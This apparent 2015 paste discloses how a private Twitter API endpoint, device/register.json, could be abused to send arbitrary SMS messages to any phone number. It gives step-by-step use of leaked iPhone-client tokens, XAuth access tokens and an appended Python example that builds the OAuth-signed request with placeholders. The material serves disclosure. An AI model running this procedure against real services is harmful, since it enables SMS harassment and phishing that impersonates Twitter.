Untitled

a guest
Apr 30th, 2015
The Twitter API contains a private endpoint that can be abused to send arbitrary text messages
----------------------------------------------------------------------------------------------

2015-04-28

1. get the "Twitter for iPhone" consumer tokens, which are publicly available, e.g. here: https://gist.github.com/rhenium/3878505

2. use the XAuth flow https://dev.twitter.com/oauth/xauth to get access tokens valid for some user, say @nst022

3. POST an OAuth-signed request to https://api.twitter.com/1.1/device/register.json with the following parameters:

raw_phone_number: +41764448212
text_message: Dahu

where "Dahu" can be an arbitrary message.

4. the phone number used in step 3 receives a text message that reads "Dahu", plus a code

Here is a 23-second video that makes this scenario more visual: https://www.dropbox.com/s/4yzsfi8fnsrm3y5/twitter_api_abuse.mov?dl=0

You can reproduce the very same thing by using, say, STTwitter for OS X https://github.com/nst/STTwitter#demo--test-project
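
The request from steps 1 to 3, as an added example that is not part of the original paste or of STTwitter: it builds the OAuth 1.0a HMAC-SHA1 signature base string and Authorization header for the POST to device/register.json so the construction can be inspected offline; nothing is sent. The consumer tokens, access tokens, nonce, timestamp and phone number in the code are constructed placeholders (the real "Twitter for iPhone" tokens and XAuth-issued tokens would go in their place), and the helper names (pct, signature_base_string, sign, build_signed_request) are my own, not a Twitter or STTwitter API.

```python
"""OAuth 1.0a (HMAC-SHA1) signing of the device/register.json POST.

Added example, not code from the original paste or from STTwitter. It only
builds the request so it runs offline; nothing is sent to Twitter. All
credentials and the phone number below are constructed placeholders.
"""
import base64
import hashlib
import hmac
import secrets
import time
from urllib.parse import quote

DEVICE_REGISTER_URL = "https://api.twitter.com/1.1/device/register.json"


def pct(value: str) -> str:
    """RFC 3986 percent-encoding as OAuth 1.0a requires: only A-Z a-z 0-9 - . _ ~ stay."""
    return quote(value, safe="-._~")


def signature_base_string(method: str, url: str, params: dict) -> str:
    """METHOD & encoded(URL) & encoded(sorted, encoded 'k=v' pairs joined by '&')."""
    pairs = sorted((pct(k), pct(v)) for k, v in params.items())
    normalized = "&".join(f"{k}={v}" for k, v in pairs)
    return "&".join([method.upper(), pct(url), pct(normalized)])


def sign(base_string: str, consumer_secret: str, token_secret: str) -> str:
    """HMAC-SHA1 over the base string, keyed with 'consumer_secret&token_secret'."""
    key = f"{pct(consumer_secret)}&{pct(token_secret)}".encode()
    digest = hmac.new(key, base_string.encode(), hashlib.sha1).digest()
    return base64.b64encode(digest).decode()


def build_signed_request(consumer_key, consumer_secret, access_token, access_token_secret,
                         raw_phone_number, text_message, nonce=None, timestamp=None):
    """Return method, URL, headers and form body of the signed POST from step 3.

    consumer_key/secret are the app tokens from step 1; access_token/secret are
    the user tokens obtained through XAuth in step 2. nonce and timestamp can be
    fixed so the output is reproducible.
    """
    oauth_params = {
        "oauth_consumer_key": consumer_key,
        "oauth_nonce": nonce or secrets.token_hex(16),
        "oauth_signature_method": "HMAC-SHA1",
        "oauth_timestamp": str(timestamp or int(time.time())),
        "oauth_token": access_token,
        "oauth_version": "1.0",
    }
    # For a form-encoded POST the body parameters are part of the signed set, so the
    # attacker-chosen text_message is covered by a signature the server will accept.
    form_params = {"raw_phone_number": raw_phone_number, "text_message": text_message}

    base_string = signature_base_string(
        "POST", DEVICE_REGISTER_URL, {**oauth_params, **form_params}
    )
    oauth_params["oauth_signature"] = sign(base_string, consumer_secret, access_token_secret)

    authorization = "OAuth " + ", ".join(
        f'{pct(k)}="{pct(v)}"' for k, v in sorted(oauth_params.items())
    )
    body = "&".join(f"{pct(k)}={pct(v)}" for k, v in form_params.items())
    return {
        "method": "POST",
        "url": DEVICE_REGISTER_URL,
        "headers": {
            "Authorization": authorization,
            "Content-Type": "application/x-www-form-urlencoded",
        },
        "body": body,
        "base_string": base_string,
    }


if __name__ == "__main__":
    # Constructed placeholders; a real run would use the tokens from steps 1 and 2.
    request = build_signed_request(
        consumer_key="CONSUMER_KEY_PLACEHOLDER",
        consumer_secret="CONSUMER_SECRET_PLACEHOLDER",
        access_token="ACCESS_TOKEN_PLACEHOLDER",
        access_token_secret="ACCESS_TOKEN_SECRET_PLACEHOLDER",
        raw_phone_number="+41791234567",
        text_message="Dahu",
    )
    print(request["headers"]["Authorization"])
    print(request["body"])
```

The point the construction makes is that nothing beyond a leaked app token and any user's XAuth access token is needed: the phone number and message are ordinary signed form parameters, so the endpoint cannot tell an official client's registration SMS from an attacker's.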
  22.  
I can see two issues here:

a) this API endpoint can be used to harass people

b) this API endpoint can be used to trick victims into believing that the SMS was sent by Twitter and make them open a malicious URL or follow a malicious process